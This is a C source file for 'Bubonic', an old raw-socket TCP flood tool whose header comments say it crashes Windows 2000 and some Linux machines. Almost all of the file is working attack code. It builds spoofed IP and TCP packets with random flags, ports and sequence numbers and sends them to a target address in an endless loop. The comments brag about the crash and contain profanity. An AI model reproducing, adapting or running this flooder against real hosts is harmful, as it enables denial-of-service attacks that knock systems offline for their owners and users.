/*
 * Bubonic.c lame DoS against Windows 2000 machines
 * and certain versions of Linux (worked against an Ultra5
 * running Redhat Zoot. Should compile under anything.
 * Randomly sends TCP packets with random settings, etc.
 *
 * Brings the load up causing the box to crash with
 * error code:
 *
 * STOP 0x00000041 (0x00001000,0x00001279,0x000042A,0x00000001)
 * MUST_SUCCEED_POOL_EMPTY
 *
 * CODE RIPPED FROM MY OTHER BGP KILLER WITH SETTINGS TWEAKED.
 * WEE MULTICODE... www.antioffline.com/daemonic.c
 *
 * shouts... hrmm fsck it why not...
 * #unixgods on the efnet, jhh, iggie, rajak, speye, obecian,
 * qwer7y, m3th, god-, tattooman, spikeman, and my wife.
 * Can't forget security staff all over the place.
 *
 * Logs for the packets sent at www.antioffline.com/logged
 * Windows2K screen shots at www.antioffline.com/loads.html
 */


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>

#ifndef __USE_BSD
#define __USE_BSD

#endif

#ifndef __FAVOR_BSD

#define __FAVOR_BSD

#endif

#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifdef LINUX
#define FIX(x)  htons(x)

#else

#define FIX(x)  (x)
#endif

struct ip_hdr {
    u_int       ip_hl:4,                
                ip_v:4;                 
    u_char      ip_tos;                 
    u_short     ip_len;                 
    u_short     ip_id;                  
    u_short     ip_off;                 
    u_char      ip_ttl;                 
    u_char      ip_p;                   
    u_short     ip_sum;                 
    u_long      saddr, daddr;           
};

struct tcp_hdr {
    u_short     th_sport;               
    u_short     th_dport;               
    u_long      th_seq;                 
    u_long      th_syn;
    u_int       th_x2:4,
                th_off:4;
    u_char      th_flags;               
    u_short     th_win;                 
    u_short     th_sum;                 
    u_short     th_urp;                 
};

struct tcpopt_hdr {
    u_char  type;                       
    u_char  len;                        
    u_short value;                      
};

struct pseudo_hdr {                     
    u_long saddr, daddr;                
    u_char mbz, ptcl;                   
    u_short tcpl;                       
};

struct packet {
    struct ip/*_hdr*/ ip;
    struct tcphdr tcp;
};

struct cksum {
    struct pseudo_hdr pseudo;
    struct tcphdr tcp;
};

struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short bgport, bgsize, pps;
u_long radd;
u_long sradd;
int sock;

void usage(char *progname)
{
    fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n", progname);
    fprintf(stderr, "Ports are set to send and receive on port 179\n");
    fprintf(stderr, "dst:\tDestination Address\n");
    fprintf(stderr, "src:\tSource Address\n");
    fprintf(stderr, "size:\tSize of packet which should be no larger than 1024 should allow for xtra header info thru routes\n");
    fprintf(stderr, "num:\tpackets\n\n");
    exit(1);
}

inline u_short in_cksum(u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
     while (nleft > 1)  {
         sum += *w++;
         nleft -= 2;
     }
     if (nleft == 1) {
         *(u_char *)(&answer) = *(u_char *) w;
         sum += answer;
     }
     sum = (sum >> 16) + (sum & 0xffff);
     sum += (sum >> 16);               
     answer = ~sum;                  
     return(answer);
}

u_long lookup(char *hostname)
{
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
       fprintf(stderr, "Could not resolve %s fucknut\n", hostname);
       exit(1);
    }

    return *(u_long *)hp->h_addr;
}


void flooder(void)
{
    struct timespec ts;
    int i;


    memset(&packet, 0, sizeof(packet));

    ts.tv_sec                   = 0;
    ts.tv_nsec                  = 10;

    packet.ip.ip_hl             = 5;
    packet.ip.ip_v              = 4;
    packet.ip.ip_p              = IPPROTO_TCP;
    packet.ip.ip_tos            = rand();
    packet.ip.ip_id             = radd;
    packet.ip.ip_len            = FIX(sizeof(packet));
    packet.ip.ip_off            = 0;
    packet.ip.ip_ttl            = 255;
    packet.ip.ip_dst.s_addr     = radd;

    packet.tcp.th_flags         = random();
    packet.tcp.th_win           = 65535;
    packet.tcp.th_seq           = random();
    packet.tcp.th_ack           = 0;
    packet.tcp.th_off           = 0; 
    packet.tcp.th_urp           = random();
    packet.tcp.th_dport         = random();
    cksum.pseudo.daddr          = sradd;
    cksum.pseudo.mbz            = 0;
    cksum.pseudo.ptcl           = IPPROTO_TCP;
    cksum.pseudo.tcpl           = random();

    s_in.sin_family             = AF_INET;
    s_in.sin_addr.s_addr        = sradd;
    s_in.sin_port               = packet.tcp.th_dport;

    for(i=0;;++i) {
    if( !(i&0x3FF) ) {
        packet.tcp.th_sport = rand();
        cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd;
        packet.tcp.th_flags = random();
        packet.tcp.th_ack   = rand();

    }
    else {
        packet.tcp.th_flags = rand();
        packet.tcp.th_ack = rand();
    }
       ++packet.ip.ip_id;
       /*++packet.tcp.th_sport*/;
       ++packet.tcp.th_seq;

       if (!bgport)
          s_in.sin_port = packet.tcp.th_dport = rand();

       packet.ip.ip_sum         = 0;
       packet.tcp.th_sum        = 0;

       cksum.tcp                = packet.tcp;

       packet.ip.ip_sum         = in_cksum((void *)&packet.ip, 20);
       packet.tcp.th_sum        = in_cksum((void *)&cksum, sizeof(cksum));

       if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0);

    }
}

int main(int argc, char *argv[])
{
    int on = 1;

    printf("Bubonic -- sil@antioffline.com\n\n");

    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
       perror("socket");
       exit(1);
    }

    setgid(getgid()); setuid(getuid());

    if (argc < 4)
       usage(argv[0]);

    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0)

{
       perror("setsockopt");
       exit(1);

    }

    srand((time(NULL) ^ getpid()) + getppid());

    printf("\nFinding host\n"); fflush(stdout);

    radd        = lookup(argv[1]);
    bgport      = atoi(argv[3]);
    bgsize      = atoi(argv[4]);
    sradd	= lookup(argv[2]);
    printf("AntiOffline -- Putting the Hero in Heroin\n");

    flooder();

    return 0;
}
/*                    www.hack.co.za           [28 August 2000]*/